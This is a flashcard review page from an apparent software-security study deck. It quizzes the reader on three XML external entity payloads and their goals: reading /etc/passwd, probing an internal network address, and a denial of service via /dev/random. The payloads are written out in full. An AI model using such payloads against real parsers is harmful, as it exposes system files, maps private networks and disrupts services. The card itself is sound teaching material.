Review Note
Last Update: 04/27/2023 06:14 AM
Current Deck: Software Security
New Card (Unpublished)Currently Published Content
Front
Back
No published tags.
Pending Suggestions
Field Change Suggestions:
Front
Commit #1541
What are the following SSRF/XML/XXE attacks intending to do?
1. <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [<!ELEMENT foo ANY > <!ENTITY bar SYSTEM "file:///etc/passwd" >]> <foo>&bar;</foo>
2. <!ENTITY bar SYSTEM "https://192.168.1.1/private" >]>
3. <!ENTITY bar SYSTEM "file:///dev/random" >]>
1. <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [<!ELEMENT foo ANY > <!ENTITY bar SYSTEM "file:///etc/passwd" >]> <foo>&bar;</foo>
2. <!ENTITY bar SYSTEM "https://192.168.1.1/private" >]>
3. <!ENTITY bar SYSTEM "file:///dev/random" >]>
Back
Commit #1541
1. extract data from local system (server)
2. probe internal network
3. DOS by reading endless stream
2. probe internal network
3. DOS by reading endless stream